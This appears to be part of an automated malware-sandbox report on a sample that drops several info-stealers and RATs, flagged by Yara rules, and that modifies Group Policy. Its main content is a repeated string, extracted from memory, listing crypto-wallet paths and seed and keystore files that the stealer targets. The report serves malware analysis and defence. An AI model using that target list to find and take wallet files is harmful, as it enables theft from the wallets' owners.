Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Code function: 6_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_0040996D

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Code function: 8_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,

8_2_004143C0

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Code function: 8_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

8_2_004144B0

Source: C:\Users\user\Desktop\file.exe

0_2_00403532

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies Group Policy settings

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 13.2.cmd.exe.58700c8.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.cmd.exe.58700c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 69.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2655895440.0000000005870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000045.00000002.3254906571.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 5860, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\wygmbcpqogng, type: DROPPED

Yara detected SectopRAT

Source: Yara match

File source: Process Memory Space: MSBuild.exe PID: 5860, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000008.00000002.2984027332.000000000427A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2xs.0.exe PID: 5788, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.u2xs.0.exe.4180e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.u2xs.0.exe.41b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2144160869.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2972613592.0000000004180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u2xs.0.exe PID: 5788, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match

File source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u2xs.0.exe, 00000008.00000002.2984027332.00000000042D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
